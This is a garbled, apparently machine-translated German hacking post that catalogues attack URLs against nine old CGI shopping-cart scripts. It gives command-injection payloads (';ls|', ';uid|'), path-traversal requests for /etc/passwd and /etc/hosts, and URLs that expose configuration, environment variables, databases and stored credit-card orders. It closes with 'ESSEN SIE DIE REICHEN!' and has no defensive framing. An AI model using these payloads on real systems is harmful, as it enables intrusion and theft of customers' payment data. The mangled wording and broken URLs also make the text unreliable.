Wir setzen unsere Untersuchung von Fehlern in der jüngsten Vergangenheit, beliebte Einkaufswagen.
Dieses Mal haben wir zu Beginn des LKW überprüfen wird , die beliebige Befehle ausführen dürfen, und nach, und andere Leckereien.
Nummer 1. werden wir (e) - Shop Online-Shop - System von Webdiscount.net
wird das Skript nicht die Zeichen Förder filtern (;) und peyapa (|):
www.xxx.com/cgi-bin/eshop.pl seite =; ls |?
Nummer 2 Hassan Consulting Shoping cart [shop.cgi] von Hassan Consulting.
das selbe:
www.xxx.com/cgi-local/shop.pl/page= | ls |
www.xxx.com/cgi-local/shop.pl/page=; ls |
leider in den Versionen 4 und höher Hassan Consulting Shoping Warenkorb ist dieser Fehler nicht schon vorhanden, aber es gibt ein weiteres Problem mit der Bitte www.xxx.com/cgi-local/shop.pl~~MD~~aux herauszufinden , welche Version eines Einkaufswagens und einen Weg , um Skript kann.
Nummer 3 ShopPlus Wagen
das gleiche, das Fehlen von Kontrollen an den Eingangs Zeichen:
www.xxx.com/scripts/shopplus.cgi dn = domainname.com & cartId =% cartId% & file =; uid |? www.xxx.com/scripts/shopplus.cgi dn = domainname.com & cartId =% cartId% & file =; cat% 20 / etc / passwd |?
Nummer 4 Multi-shop 1,06
Stattdessen Vorlagendatei können Sie einen beliebigen Befehl angeben.
www.xxx.com/cgi-bin/mshop2?product_template=;ls|&show_items=1&config_file= picodirect.co.uk_mshop2.conf & user_notebooks = note_envoy
Nummer 5 Webcart von Mountain Network Systems
Ausführen von Remote - Befehlen:
www.xxx.com/cgi-bin/webcart.cgi?CONFIG=moutain&CHANGE=YESNEXTPAGE=;ls|&CODE=PHOLD
Ferner sind andere Schwachstellen gestiegen
Number 6 Dansie Warenkorb 3,04 Multiple Vulnerabilities
Hinzufügen zu Ende bestimmter Variablen und Werte zu http: //target/cgi-bin/cart.pl?
Es erlaubt Remote - Benutzer bestimmte Aktionen auszuführen.
"Vars" Anzeigeeinstellungen
Anwendungskonfigurationseinstellungen, die den Benutzernamen und das Passwort verwendet , umfasst
für Kreditkartentransaktionen.
Umgebungseinstellungen erhalten werden
unter Verwendung des "env".
Die Zeichenfolge "db" wird die gesamte Datenbank - Datei auflisten , die alle Elemente im Warenkorb enthält.
www.xxx.com/cgi-bin/cart.pl?vars
www.xxx.com/cgi-bin/cart.pl?env
www.xxx.com/cgi-bin/cart.pl?db
Nummer 7 ShopCartCGI v 2.3
der Fehler ermöglicht es einem Remote - Benutzer Dateien auf dem Server anzuzeigen:
www.xxx.com/directory/gotopage.cgi?13686+/../../../../../../../../../../../ .. /../../../../etc/passwd
www.xxx.com/directory/genindexpage.cgi?13687+Home+/../../../../../../../../../../../. ./../../../../etc/passwd
Nummer 8 QuikStore Warenkorb
Ein entfernter Benutzer kann Dateien auf dem System anzuzeigen:
www.xxx.com/quikstore.cgi?blah&template=../../.
./../../../../../../../etc/passwd%00.html
www.xxx.com/quikstore.cgi?blah&template=../../../../../../../../../../../../etc/ Gastgeber
www.xxx.com/quikstore.cgi?blah&t emplate = .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / usr / bin / id |
Number 9 DCShop Elektronische Einkaufswagen
Viele Bugs:
www.xxx.com/cgi-bin/DCShop/Orders/orders.txt - Informationen über die Kreditkarte in älteren Versionen des Wagens ist seit gesehen.
www.xxx.com/cgi-bin/DCShop/dcshop_admin.cgi?action=view_orders - die alten Ausgaben der Kredit in einigen Versionen.
Ihr Fehler Durito.
_________________
ESSEN SIE DIE REICHEN!
|
Kommentare
Kommentar nicht vergessen , dass der Inhalt und der Ton Ihrer Nachrichten , die Gefühle von echten Menschen verletzen können, Respekt und Toleranz gegenüber seinen Gesprächspartnern, auch wenn Sie Ihr Verhalten in Bezug auf die Meinungsfreiheit ihre Meinung nicht teilen, und die Anonymität des Internets, ändert sich nicht nur virtuell, sondern realen Welt. Alle Kommentare werden aus dem Index, Spam - Kontrolle versteckt.